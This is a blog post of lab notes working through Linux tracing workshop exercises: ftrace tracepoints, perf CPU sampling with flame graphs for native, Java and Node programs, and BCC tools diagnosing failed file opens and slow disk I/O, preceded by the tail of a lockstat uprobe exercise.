<p>// TODO Update the mutex_lock_hist histogram with the time we held the lock</p>
<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code> u64 slot = bpf_log2l(hold_time / 1000);
mutex_lock_hist.increment(slot);
</code></pre></div></div>
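<p>bpf_log2l above maps a value to its power-of-two histogram bucket. Python's int.bit_length computes a comparable slot index, which is handy for sanity-checking which bucket a given hold time lands in (the sample values are made up):</p>

```python
from collections import Counter

def log2_slot(value):
    # Same idea as bpf_log2l: slot n covers values in [2**(n-1), 2**n - 1]
    return value.bit_length()

# hold times in microseconds -> histogram of power-of-two buckets
hist = Counter(log2_slot(us) for us in [1, 2, 3, 3, 5, 9])
print(sorted(hist.items()))   # [(1, 1), (2, 3), (3, 1), (4, 1)]
```

<p>Log-scaled buckets are what makes these histograms readable across microsecond-to-second ranges without pre-choosing bin widths.</p>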
<p>// TODO Similarly to the previous probe, attach the following probes:
// uprobe in pthread_mutex_lock handled by probe_mutex_lock
// uretprobe in pthread_mutex_lock handled by probe_mutex_lock_return
// uprobe in pthread_mutex_unlock handled by probe_mutex_unlock</p>
<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code> bpf.attach_uprobe(name="pthread", sym="pthread_mutex_lock", fn_name="probe_mutex_lock", pid=pid)
bpf.attach_uretprobe(name="pthread", sym="pthread_mutex_lock", fn_name="probe_mutex_lock_return", pid=pid)
bpf.attach_uprobe(name="pthread", sym="pthread_mutex_unlock", fn_name="probe_mutex_unlock", pid=pid)
</code></pre></div></div>
<p>// TODO Print a nicely formatted line with the mutex description, wait time,
// hold time, enter count, and stack (use print_stack)</p>
<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code> print("\tmutex %s ::: wait time %.2fus ::: hold time %.2fus ::: enter count %d" %
(mutex_descr, v.wait_time_ns/1000.0, v.lock_time_ns/1000.0, v.enter_count))
print_stack(bpf, pid, stacks, k.lock_stack_id)
</code></pre></div></div>
<p>Result:</p>
<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code> root@ubuntu1604:~/linux-tracing-workshop# python lockstat.py $(pidof parprimes)
init stack for mutex 7fff3dfa1fa0 (#1)
[unknown] (7f2eebaa85a0)
[unknown] (7f2eeb6f5830)
[unknown] (113e258d4c544155)
thread 53243
mutex [unknown] ::: wait time 7.01us ::: hold time 5.56us ::: enter count 1
[unknown] (7f2eebcccb34)
[unknown] (7f2eeb70eff8)
[unknown] (7f2eeba9b060)
thread 53246
mutex #1 ::: wait time 1655.31us ::: hold time 809.63us ::: enter count 369
[unknown] (4009f0)
[unknown] (400a44)
[unknown] (7f2eebaa66ba)
thread 53247
mutex #1 ::: wait time 12850.63us ::: hold time 660.04us ::: enter count 302
[unknown] (4009f0)
[unknown] (400a44)
[unknown] (7f2eebaa66ba)
thread 53248
mutex #1 ::: wait time 13290.15us ::: hold time 610.43us ::: enter count 281
[unknown] (4009f0)
[unknown] (400a44)
[unknown] (7f2eebaa66ba)
thread 53249
mutex #1 ::: wait time 1282.58us ::: hold time 621.87us ::: enter count 279
[unknown] (4009f0)
[unknown] (400a44)
[unknown] (7f2eebaa66ba)
wait time (us) : count distribution
0 -> 1 : 0 | |
2 -> 3 : 0 | |
4 -> 7 : 1229 |****************************************|
8 -> 15 : 1 | |
16 -> 31 : 0 | |
32 -> 63 : 0 | |
64 -> 127 : 0 | |
128 -> 255 : 0 | |
256 -> 511 : 0 | |
512 -> 1023 : 0 | |
1024 -> 2047 : 0 | |
2048 -> 4095 : 0 | |
4096 -> 8191 : 0 | |
8192 -> 16383 : 2 | |
hold time (us) : count distribution
0 -> 1 : 0 | |
2 -> 3 : 1227 |****************************************|
4 -> 7 : 4 | |
8 -> 15 : 1 | |
</code></pre></div></div>
<p>The original lab's solution: <a href="https://github.com/goldshtn/linux-tracing-workshop/blob/master/lockstat-solution.py">lockstat-solution</a></p>
linux-tracing-workshop-part 12017-12-05T00:00:00+00:00http://terenceli.github.io/%E6%8A%80%E6%9C%AF/2017/12/05/tracing1
<p>Notes from working through the <a href="https://github.com/goldshtn/linux-tracing-workshop">linux-tracing-workshop</a> labs; this first part covers seven exercises.</p>
<ul>
<li><a href="#1">1. Probing Tracepoints with ftrace</a></li>
<li><a href="#2">2. CPU Sampling with perf and Flame Graphs</a></li>
<li><a href="#3">3. Using BPF Tools: Broken File Opens</a></li>
<li><a href="#4">4. Using BPF Tools: Slow File I/O</a></li>
<li><a href="#5">5. Using BPF Tools: Chasing a Memory Leak</a></li>
<li><a href="#6">6. Using BPF Tools: Database and Disk Stats and Stacks</a></li>
<li><a href="#7">7. Using BPF Tools: Node and JVM USDT Probes</a></li>
</ul>
<h2 id="1">1. Probing Tracepoints with ftrace</h2>
<h3>Enabling the sched:sched_switch tracepoint to trace thread switches</h3>
<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code> root@ubuntu1604:~# cd /sys/kernel/debug/tracing/
root@ubuntu1604:/sys/kernel/debug/tracing# echo 1 > tracing_on
root@ubuntu1604:/sys/kernel/debug/tracing# cat events/sched/sched_switch/format
name: sched_switch
ID: 273
format:
field:unsigned short common_type; offset:0; size:2; signed:0;
field:unsigned char common_flags; offset:2; size:1; signed:0;
field:unsigned char common_preempt_count; offset:3; size:1; signed:0;
field:int common_pid; offset:4; size:4; signed:1;
field:char prev_comm[16]; offset:8; size:16; signed:1;
field:pid_t prev_pid; offset:24; size:4; signed:1;
field:int prev_prio; offset:28; size:4; signed:1;
field:long prev_state; offset:32; size:8; signed:1;
field:char next_comm[16]; offset:40; size:16; signed:1;
field:pid_t next_pid; offset:56; size:4; signed:1;
field:int next_prio; offset:60; size:4; signed:1;
print fmt: "prev_comm=%s prev_pid=%d prev_prio=%d prev_state=%s%s ==> next_comm=%s next_pid=%d next_prio=%d", REC->prev_comm, REC->prev_pid, REC->prev_prio, REC->prev_state & (2048-1) ? __print_flags(REC->prev_state & (2048-1), "|", { 1, "S"} , { 2, "D" }, { 4, "T" }, { 8, "t" }, { 16, "Z" }, { 32, "X" }, { 64, "x" }, { 128, "K" }, { 256, "W" }, { 512, "P" }, { 1024, "N" }) : "R", REC->prev_state & 2048 ? "+" : "", REC->next_comm, REC->next_pid, REC->next_prio
root@ubuntu1604:/sys/kernel/debug/tracing# echo 1 > events/sched/sched_switch/enable
root@ubuntu1604:/sys/kernel/debug/tracing# cat trace
# tracer: nop
#
# entries-in-buffer/entries-written: 703/703 #P:1
#
# _-----=> irqs-off
# / _----=> need-resched
# | / _---=> hardirq/softirq
# || / _--=> preempt-depth
# ||| / delay
# TASK-PID CPU# |||| TIMESTAMP FUNCTION
# | | | |||| | |
bash-817 [000] d... 371.932169: sched_switch: prev_comm=bash prev_pid=817 prev_prio=120 prev_state=R ==> next_comm=kworker/u128:3 next_pid=80 next_prio=120
kworker/u128:3-80 [000] d... 371.932187: sched_switch: prev_comm=kworker/u128:3 prev_pid=80 prev_prio=120 prev_state=S ==> next_comm=sshd next_pid=790 next_prio=120
sshd-790 [000] d... 371.932226: sched_switch: prev_comm=sshd prev_pid=790 prev_prio=120 prev_state=S ==> next_comm=bash next_pid=817 next_prio=120
bash-817 [000] d... 371.932236: sched_switch: prev_comm=bash prev_pid=817 prev_prio=120 prev_state=S ==> next_comm=swapper/0 next_pid=0 next_prio=120
<idle>-0 [000] d... 371.935521: sched_switch: prev_comm=swapper/0 prev_pid=0 prev_prio=120 prev_state=R ==> next_comm=rcu_sched next_pid=7 next_prio=120
rcu_sched-7 [000] d... 371.935525: sched_switch: prev_comm=rcu_sched prev_pid=7 prev_prio=120 prev_state=S ==> next_comm=swapper/0 next_pid=0 next_prio=120
<idle>-0 [000] d... 371.939514: sched_switch: prev_comm=swapper/0 prev_pid=0 prev_prio=120 prev_state=R ==> next_comm=rcu_sched next_pid=7 next_prio=120
rcu_sched-7 [000] d... 371.939517: sched_switch: prev_comm=rcu_sched prev_pid=7 prev_prio=120 prev_state=S ==> next_comm=swapper/0 next_pid=0 next_prio=120
<idle>-0 [000] d... 371.943513: sched_switch: prev_comm=swapper/0 prev_pid=0 prev_prio=120 prev_state=R ==> next_comm=rcu_sched next_pid=7 next_prio=120
rcu_sched-7 [000] d... 371.943516: sched_switch: prev_comm=rcu_sched prev_pid=7 prev_prio=120 prev_state=S ==> next_comm=swapper/0 next_pid=0 next_prio=120
<idle>-0 [000] d... 371.947521: sched_switch: prev_comm=swapper/0 prev_pid=0 prev_prio=120 prev_state=R ==> next_comm=rcu_sched next_pid=7 next_prio=120
rcu_sched-7 [000] d... 371.947525: sched_switch: prev_comm=rcu_sched prev_pid=7 prev_prio=120 prev_state=S ==> next_comm=swapper/0 next_pid=0 next_prio=120
<idle>-0 [000] d... 371.951522: sched_switch: prev_comm=swapper/0 prev_pid=0 prev_prio=120 prev_state=R ==> next_comm=rcu_sched next_pid=7 next_prio=120
rcu_sched-7 [000] d... 371.951527: sched_switch: prev_comm=rcu_sched prev_pid=7 prev_prio=120 prev_state=S ==> next_comm=swapper/0 next_pid=0 next_prio=120
<idle>-0 [000] d... 371.955518: sched_switch: prev_comm=swapper/0 prev_pid=0 prev_prio=120 prev_state=R ==> next_comm=rcu_sched next_pid=7 next_prio=120
rcu_sched-7 [000] d... 371.955522: sched_switch: prev_comm=rcu_sched prev_pid=7 prev_prio=120 prev_state=S ==> next_comm=swapper/0 next_pid=0 next_prio=120
<idle>-0 [000] d... 371.959515: sched_switch: prev_comm=swapper/0 prev_pid=0 prev_prio=120 prev_state=R ==> next_comm=rcu_sched next_pid=7 next_prio=120
rcu_sched-7 [000] d... 371.959518: sched_switch: prev_comm=rcu_sched prev_pid=7 prev_prio=120 prev_state=S ==> next_comm=swapper/0 next_pid=0 next_prio=120
<idle>-0 [000] d... 371.963516: sched_switch: prev_comm=swapper/0 prev_pid=0 prev_prio=120 prev_state=R ==> next_comm=rcu_sched next_pid=7 next_prio=120
echo 0 > events/sched/sched_switch/enable
</code></pre></div></div>
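<p>The echo commands above just write into tracefs files; a small helper that builds those paths (a sketch — the standard /sys/kernel/debug/tracing mount is assumed, and actually writing to the files requires root):</p>

```python
import os.path

TRACEFS = "/sys/kernel/debug/tracing"

def tracepoint_paths(category, name):
    """Return the (enable, format) file paths for a tracepoint."""
    base = os.path.join(TRACEFS, "events", category, name)
    return os.path.join(base, "enable"), os.path.join(base, "format")

enable, fmt = tracepoint_paths("sched", "sched_switch")
# Writing "1" to `enable` (as root) turns the tracepoint on,
# just like `echo 1 > events/sched/sched_switch/enable` above.
```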
<h3>Enable the function tracer</h3>
<p>Trace function calls:</p>
<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code> root@ubuntu1604:/sys/kernel/debug/tracing# echo function > current_tracer
root@ubuntu1604:/sys/kernel/debug/tracing# echo vfs_write > set_ftrace_filter
root@ubuntu1604:/sys/kernel/debug/tracing# cat trace
qemu-ga-449 [000] .... 591.951939: vfs_write <-SyS_write
qemu-ga-449 [000] .... 591.951965: vfs_write <-SyS_write
qemu-ga-449 [000] .... 591.952138: vfs_write <-SyS_write
qemu-ga-449 [000] .... 591.952222: vfs_write <-SyS_write
qemu-ga-449 [000] .... 591.952247: vfs_write <-SyS_write
qemu-ga-449 [000] .... 591.957259: vfs_write <-SyS_write
qemu-ga-449 [000] .... 591.957331: vfs_write <-SyS_write
qemu-ga-449 [000] .... 591.957356: vfs_write <-SyS_write
qemu-ga-449 [000] .... 591.957516: vfs_write <-SyS_write
rs:main Q:Reg-425 [000] .... 591.957797: vfs_write <-SyS_write
</code></pre></div></div>
<p>View the full call path of a function:</p>
<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code> root@ubuntu1604:/sys/kernel/debug/tracing# echo function_graph > current_tracer
root@ubuntu1604:/sys/kernel/debug/tracing# echo > set_ftrace_filter
root@ubuntu1604:/sys/kernel/debug/tracing# echo vfs_write > set_graph_function
root@ubuntu1604:/sys/kernel/debug/tracing# cat trace
0) sshd-902 => rs:main-425
------------------------------------------
0) | vfs_write() {
0) | rw_verify_area() {
0) | security_file_permission() {
0) | apparmor_file_permission() {
0) | common_file_perm() {
0) 0.137 us | aa_file_perm();
0) 0.959 us | }
0) 1.468 us | }
0) 2.035 us | }
0) 2.605 us | }
</code></pre></div></div>
<p>Limit the graph depth:</p>
<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code> echo 2 > max_graph_depth
</code></pre></div></div>
<p>Turn tracing off:</p>
<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code> # echo nop > current_tracer
# echo > set_graph_function
</code></pre></div></div>
<h2 id="2">2. CPU Sampling with perf and Flame Graphs</h2>
<h3>A native program</h3>
<p>Compile the program:</p>
<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code> gcc -g -fno-omit-frame-pointer -fopenmp primes.c -o primes
root@ubuntu1604:~/linux-tracing-workshop# export OMP_NUM_THREADS=16
root@ubuntu1604:~/linux-tracing-workshop# perf record -g -F 997 -- ./primes
</code></pre></div></div>
<p>-g captures call stacks and -F sets the sampling frequency; perf.data is written to the current directory.</p>
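<p>A side note on -F 997: an off-round, prime frequency is commonly chosen so sampling does not run in lockstep with periodic work on the system. The resulting sampling period is easy to compute (a sketch):</p>

```python
def sample_period_us(freq_hz):
    """Sampling period in microseconds for a given perf -F frequency."""
    return 1_000_000 / freq_hz

print(round(sample_period_us(997)))  # 1003
```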
<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code> root@ubuntu1604:~/linux-tracing-workshop# perf report --stdio
# To display the perf.data header info, please use --header/--header-only options.
#
#
# Total Lost Samples: 0
#
# Samples: 7K of event 'cpu-clock'
# Event count (approx.): 7265797196
#
# Children Self Command Shared Object Symbol
# ........ ........ ....... ................. ...............................
#
99.99% 0.00% primes primes [.] main._omp_fn.0
|
---main._omp_fn.0
|
|--99.97%-- is_prime
| |
| |--85.01%-- is_divisible
| | |
| | |--0.08%-- retint_user
| | | prepare_exit_to_usermode
| | | exit_to_usermode_loop
</code></pre></div></div>
<p>is_divisible accounts for most of the time; perf annotate shows the detail at the instruction level.</p>
<p>root@ubuntu1604:~/linux-tracing-workshop# perf annotate</p>
<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code> is_divisible /root/linux-tracing-workshop/primes
│
│ int is_divisible(int n, int d)
│ {
0.02 │ push %rbp
│ mov %rsp,%rbp
5.98 │ mov %edi,-0x4(%rbp)
│ mov %esi,-0x8(%rbp)
│ return n % d == 0;
│ mov -0x4(%rbp),%eax
3.51 │ cltd
2.75 │ idivl -0x8(%rbp)
71.34 │ mov %edx,%eax
│ test %eax,%eax
5.51 │ sete %al
5.82 │ movzbl %al,%eax
│ }
5.07 │ pop %rbp
│ ← retq
</code></pre></div></div>
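<p>The hot is_divisible is no surprise given what primes.c does; a rough Python sketch of the same deliberately naive trial-division logic (names mirror the C source):</p>

```python
def is_divisible(n, d):
    return n % d == 0

def is_prime(n):
    # Deliberately naive: tries every divisor up to n-1,
    # so is_divisible dominates the profile.
    if n < 2:
        return False
    for d in range(2, n):
        if is_divisible(n, d):
            return False
    return True

print([n for n in range(2, 20) if is_prime(n)])  # [2, 3, 5, 7, 11, 13, 17, 19]
```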
<p>Generate a flame graph:</p>
<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code> # perf script > primes.stacks
# FlameGraph/stackcollapse-perf.pl primes.stacks > primes.collapsed
# FlameGraph/flamegraph.pl primes.collapsed > primes.svg
</code></pre></div></div>
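<p>The stackcollapse step folds every sampled stack into a single semicolon-joined line with a count, which is the input format flamegraph.pl expects. A minimal sketch of that folding (toy input, root-first frame order assumed):</p>

```python
from collections import Counter

def collapse(stacks):
    """stacks: list of frame lists, root first. Returns folded 'frames count' lines."""
    counts = Counter(";".join(s) for s in stacks)
    return [f"{k} {v}" for k, v in sorted(counts.items())]

samples = [
    ["main", "is_prime", "is_divisible"],
    ["main", "is_prime", "is_divisible"],
    ["main", "is_prime"],
]
print(collapse(samples))  # ['main;is_prime 1', 'main;is_prime;is_divisible 2']
```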
<p>The flame graph confirms that is_divisible is where the time goes.</p>
<p><img src="/assets/img/tracing1/2.png" alt="" /></p>
<h3>A Java program</h3>
<p>Download and install <a href="https://github.com/jvm-profiling-tools/perf-map-agent.git">perf_map_agent</a>.</p>
<p>Start the sample app, but don't press Enter yet:</p>
<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code> root@ubuntu1604:~/linux-tracing-workshop# java -XX:+PreserveFramePointer -XX:-Inline slowy/App
Press ENTER to start.
</code></pre></div></div>
<p>In another terminal:</p>
<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code> root@ubuntu1604:~/perf-map-agent/bin# jps
20274 App
20285 Jps
root@ubuntu1604:~/perf-map-agent/bin# ./perf-java-report-stack 20274
</code></pre></div></div>
<p>Now press Enter in the first terminal; the second terminal starts collecting data, and again isDivisible is where the time goes:</p>
<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code> Samples: 1K of event 'cpu-clock', Event count (approx.): 11969696850
Children Self Command Shared Object Symbol
+ 100.00% 0.00% java perf-20274.map [.] call_stub
+ 100.00% 0.00% java libjvm.so [.] 0xffff801f982d987b
+ 100.00% 0.00% java libjvm.so [.] 0xffff801f982fb52e
+ 100.00% 0.00% java libjvm.so [.] 0xffff801f982fde5f
+ 100.00% 0.00% java libjli.so [.] 0xffff801f96337552
+ 100.00% 0.00% java libjli.so [.] 0xffff801f9633b3dd
+ 100.00% 0.00% java libpthread-2.23.so [.] start_thread
+ 89.79% 10.63% java perf-20274.map [.] Lslowy/App;::isPrime
+ 89.20% 89.03% java perf-20274.map [.] Lslowy/App;::isDivisible
+ 72.07% 0.00% java perf-20274.map [.] Lslowy/App;::main
+ 17.13% 0.00% java perf-20274.map [.] Lslowy/App;::main
+ 10.80% 0.08% java perf-20274.map [.] Interpreter
+ 0.08% 0.00% java libjvm.so [.] 0xffff801f97f82ab0
+ 0.08% 0.00% java [kernel.kallsyms] [k] schedule
</code></pre></div></div>
<p>Generate the flame graph:</p>
<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code> root@ubuntu1604:~/perf-map-agent/bin# cd /tmp/
root@ubuntu1604:/tmp# ls
hsperfdata_root java.svg perf-18877.data.old perf-20210.data perf-20210.map perf-20274.data perf-20274.map perf.data perf-vdso.so-4k55kH perf-vdso.so-HGHJGC
root@ubuntu1604:/tmp# mv perf-20274.data perf.data
root@ubuntu1604:/tmp# perf script | ~/FlameGraph/stackcollapse-perf.pl | ~/FlameGraph/flamegraph.pl --colors=java > java.svg
</code></pre></div></div>
<p><img src="/assets/img/tracing1/2.1.png" alt="" /></p>
<h3>A Node program</h3>
<p>Node must be started with --perf_basic_prof. Enter the nodey directory and start run.sh:</p>
<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code> root@ubuntu1604:~/linux-tracing-workshop/nodey# ./run.sh perf
</code></pre></div></div>
<p>Start perf in another terminal:</p>
<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code> root@ubuntu1604:~/perf-map-agent/bin# perf record -F 97 -p $(pgrep -n node) -g
</code></pre></div></div>
<p>Drive some load from the first terminal:</p>
<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code> root@ubuntu1604:~/linux-tracing-workshop/nodey# ab -c 10 -n 100 -m POST 'http://localhost:3000/users/auth?username=foo&password=wrong'
</code></pre></div></div>
<p>Stop perf and inspect the data:</p>
<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code> root@ubuntu1604:~/perf-map-agent/bin# perf report -i perf.data
</code></pre></div></div>
<p>A flame graph works here too:</p>
<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code>root@ubuntu1604:~/perf-map-agent/bin# perf script -i perf.data | ~/FlameGraph/stackcollapse-perf.pl | ~/FlameGraph/flamegraph.pl > node.svg
</code></pre></div></div>
<h2 id="3"> 3. Using BPF Tools: Broken File Opens </h2>
<p>This lab uses BCC tools to diagnose a failure during program startup.</p>
<p>First, compile the buggy program:</p>
<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code> gcc -g -fno-omit-frame-pointer -O0 server.c -o server
</code></pre></div></div>
<p>Run server. Although it appears to start successfully, it never finishes initializing and seems stuck, yet top shows it burning a fair amount of CPU.
Check its user-mode and kernel-mode CPU utilization:</p>
<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code> root@ubuntu1604:~# pidstat -u -p $(pidof server) 1
Linux 4.4.0-21-generic (ubuntu1604) 12/04/2017 _x86_64_ (1 CPU)
12:46:39 PM UID PID %usr %system %guest %CPU CPU Command
12:46:40 PM 0 29947 1.15 11.49 0.00 12.64 0 server
12:46:41 PM 0 29947 1.18 11.76 0.00 12.94 0 server
12:46:42 PM 0 29947 5.62 6.74 0.00 12.36 0 server
12:46:43 PM 0 29947 2.30 10.34 0.00 12.64 0 server
12:46:44 PM 0 29947 1.11 11.11 0.00 12.22 0 server
12:46:45 PM 0 29947 2.27 9.09 0.00 11.36 0 server
12:46:46 PM 0 29947 3.53 10.59 0.00 14.12 0 server
12:46:47 PM 0 29947 1.16 11.63 0.00 12.79 0 server
</code></pre></div></div>
<p>Most of the CPU time is spent in kernel mode. syscount shows that the server issues the nanosleep and open syscalls very frequently.</p>
<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code> root@ubuntu1604:~/perf-tools/bin# ./syscount -cp $(pidof server)
Tracing PID 29947... Ctrl-C to end.
^CSYSCALL COUNT
nanosleep 202027
open 202054
root@ubuntu1604:~/perf-tools/bin#
</code></pre></div></div>
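<p>Conceptually, syscount is just a counter keyed by syscall name; a sketch of the same aggregation over (pid, syscall) events (toy data, not the real BPF plumbing):</p>

```python
from collections import Counter

def count_syscalls(events, pid):
    """events: iterable of (pid, syscall_name) tuples; mirrors `syscount -p PID`."""
    return Counter(name for p, name in events if p == pid)

events = [(29947, "open"), (29947, "nanosleep"),
          (29947, "open"), (1, "read")]
print(count_syscalls(events, 29947))  # open: 2, nanosleep: 1
```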
<p>opensnoop shows the open() calls the process issues:</p>
<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code> root@ubuntu1604:~# opensnoop -p $(pidof server) -d 0.01
Tracing open()s issued by PID 910 for 0.01 seconds (buffered)...
COMM PID FD FILE
server 910 -1 /etc/tracing-server-example.conf
server 910 -1 /etc/tracing-server-example.conf
server 910 -1 /etc/tracing-server-example.conf
server 910 -1 /etc/tracing-server-example.conf
server 910 -1 /etc/tracing-server-example.conf
server 910 -1 /etc/tracing-server-example.conf
server 910 -1 /etc/tracing-server-example.conf
server 910 -1 /etc/tracing-server-example.conf
server 910 -1 /etc/tracing-server-example.conf
</code></pre></div></div>
<p>The root cause is now clear: the server keeps trying to open /etc/tracing-server-example.conf, which doesn't exist, so initialization never completes.</p>
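<p>The FD column of -1 means every open() fails, which is easy to reproduce: opening a missing path fails with ENOENT, and the server just keeps retrying. A sketch (the config path is the one opensnoop reported):</p>

```python
import os

def try_open(path):
    """Return a file descriptor, or -1 on open failure (like the C server does)."""
    try:
        return os.open(path, os.O_RDONLY)
    except FileNotFoundError:  # errno.ENOENT — what opensnoop's FD = -1 reflects here
        return -1

# On a box without the config file this returns -1 over and over,
# which is the open/nanosleep retry loop syscount exposed.
```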
<p>argdist can also inspect the arguments of functions and syscalls. Looking at nanosleep's argument, almost all values fall in the 512~1023 bucket; the server sleeps for 1000 ns.</p>
<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code> root@ubuntu1604:~/bcc/tools# ./argdist.py -p $(pidof server) -H 'p::SyS_nanosleep(struct timespec *time):u64:time->tv_nsec'
[14:09:10]
time->tv_nsec : count distribution
0 -> 1 : 0 | |
2 -> 3 : 0 | |
4 -> 7 : 0 | |
8 -> 15 : 0 | |
16 -> 31 : 0 | |
32 -> 63 : 0 | |
64 -> 127 : 0 | |
128 -> 255 : 0 | |
256 -> 511 : 0 | |
512 -> 1023 : 15864 |****************************************|
[14:09:11]
time->tv_nsec : count distribution
0 -> 1 : 0 | |
2 -> 3 : 0 | |
4 -> 7 : 0 | |
8 -> 15 : 0 | |
16 -> 31 : 0 | |
32 -> 63 : 0 | |
64 -> 127 : 0 | |
128 -> 255 : 0 | |
256 -> 511 : 0 | |
512 -> 1023 : 15890 |****************************************|
[14:09:12]
</code></pre></div></div>
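<p>argdist's histogram buckets are powers of two: a value v lands in [2^k, 2^(k+1)-1], which is why a 1000 ns sleep always shows up as 512 -> 1023. A sketch of the bucketing:</p>

```python
def log2_bucket(v):
    """Return the (low, high) power-of-two bucket containing v, for v >= 1."""
    low = 1
    while low * 2 <= v:
        low *= 2
    return (low, low * 2 - 1)

print(log2_bucket(1000))  # (512, 1023)
```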
<p>Similarly, inspect open's argument and return value:</p>
<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code> root@ubuntu1604:~/bcc/tools# ./argdist.py -p $(pidof server) -C 'p:c:open(char *filename):char*:filename'
[14:13:04]
p:c:open(char *filename):char*:filename
COUNT EVENT
14626 filename = /etc/tracing-server-example.conf
[14:13:05]
p:c:open(char *filename):char*:filename
COUNT EVENT
14606 filename = /etc/tracing-server-example.conf
[14:13:06]
p:c:open(char *filename):char*:filename
COUNT EVENT
14482 filename = /etc/tracing-server-example.conf
[14:13:07]
p:c:open(char *filename):char*:filename
COUNT EVENT
14400 filename = /etc/tracing-server-example.conf
^Croot@ubuntu1604:~/bcc/tools# ./argdist.py -p $(pidof server) -C 'r:c:open():int:$retval'
[14:13:28]
r:c:open():int:$retval
COUNT EVENT
14451 $retval = -1
[14:13:29]
r:c:open():int:$retval
COUNT EVENT
14441 $retval = -1
^Croot@ubuntu1604:~/bcc/tools#
</code></pre></div></div>
<h2 id="4"> 4. Using BPF Tools: Slow File I/O </h2>
<p>This lab tracks down occasional high I/O latency.</p>
<p>First compile and run the lab program:</p>
<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code> root@ubuntu1604:~/linux-tracing-workshop# gcc -g -fno-omit-frame-pointer -O0 -pthread logger.c -o logger
root@ubuntu1604:~/linux-tracing-workshop# ./logger
</code></pre></div></div>
<p>Suppose you already know that the logger program occasionally shows high latency (which is why you were asked to look at it :)). The first suspect is slow I/O. Check with biolatency:</p>
<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code> root@ubuntu1604:/usr/share/bcc/tools# ./biolatency 1
Tracing block device I/O... Hit Ctrl-C to end.
usecs : count distribution
0 -> 1 : 0 | |
2 -> 3 : 0 | |
4 -> 7 : 0 | |
8 -> 15 : 0 | |
16 -> 31 : 0 | |
32 -> 63 : 0 | |
64 -> 127 : 0 | |
128 -> 255 : 0 | |
256 -> 511 : 0 | |
512 -> 1023 : 24 |********* |
1024 -> 2047 : 98 |****************************************|
2048 -> 4095 : 1 | |
4096 -> 8191 : 1 | |
8192 -> 16383 : 5 |** |
usecs : count distribution
0 -> 1 : 0 | |
2 -> 3 : 0 | |
4 -> 7 : 0 | |
8 -> 15 : 0 | |
16 -> 31 : 0 | |
32 -> 63 : 0 | |
64 -> 127 : 0 | |
128 -> 255 : 0 | |
256 -> 511 : 0 | |
512 -> 1023 : 26 |********** |
1024 -> 2047 : 102 |****************************************|
2048 -> 4095 : 1 | |
4096 -> 8191 : 0 | |
8192 -> 16383 : 4 |* |
^C
usecs : count distribution
0 -> 1 : 0 | |
2 -> 3 : 0 | |
4 -> 7 : 0 | |
8 -> 15 : 0 | |
16 -> 31 : 0 | |
32 -> 63 : 0 | |
64 -> 127 : 0 | |
128 -> 255 : 0 | |
256 -> 511 : 0 | |
512 -> 1023 : 20 |******** |
1024 -> 2047 : 93 |****************************************|
2048 -> 4095 : 8 |*** |
4096 -> 8191 : 1 | |
8192 -> 16383 : 5 |** |
root@ubuntu1604:/usr/share/bcc/tools#
</code></pre></div></div>
<p>Most I/Os are fast, but a few take much longer. biosnoop shows that some of logger's I/Os are clearly larger and slower:</p>
<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code> root@ubuntu1604:/usr/share/bcc/tools# ./biosnoop
TIME(s) COMM PID DISK T SECTOR BYTES LAT(ms)
0.000000000 logger 2120 vda W 3230184 4096 1.49
0.001188000 jbd2/vda1-8 173 vda W 1611120 8192 1.15
0.002201000 jbd2/vda1-8 173 vda W 1611136 4096 0.90
0.023616000 logger 2120 vda W 3230192 4096 1.22
0.024938000 jbd2/vda1-8 173 vda W 1611144 8192 1.29
0.026173000 jbd2/vda1-8 173 vda W 1611160 4096 1.13
0.047631000 logger 2120 vda W 3230192 4096 1.23
0.048968000 jbd2/vda1-8 173 vda W 1611168 8192 1.30
0.050024000 jbd2/vda1-8 173 vda W 1611184 4096 0.95
0.071440000 logger 2120 vda W 3230192 4096 1.20
0.072585000 jbd2/vda1-8 173 vda W 1611192 8192 1.11
0.073800000 jbd2/vda1-8 173 vda W 1611208 4096 1.09
0.090548000 logger 2121 vda W 3217408 1048576 9.84
0.091801000 jbd2/vda1-8 173 vda W 1611216 8192 1.16
0.093033000 jbd2/vda1-8 173 vda W 1611232 4096 1.13
</code></pre></div></div>
<p>Looking at the logger process alone, it occasionally issues a very slow I/O:</p>
<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code> ^Croot@ubuntu1604:/usr/share/bcc/tools# ./biosnoop -p $(pidof logger)
TIME(s) COMM PID DISK T SECTOR BYTES LAT(ms)
0.000000000 logger 2120 vda W 3235144 4096 1.15
0.001174000 jbd2/vda1-8 173 vda W 1609744 8192 1.10
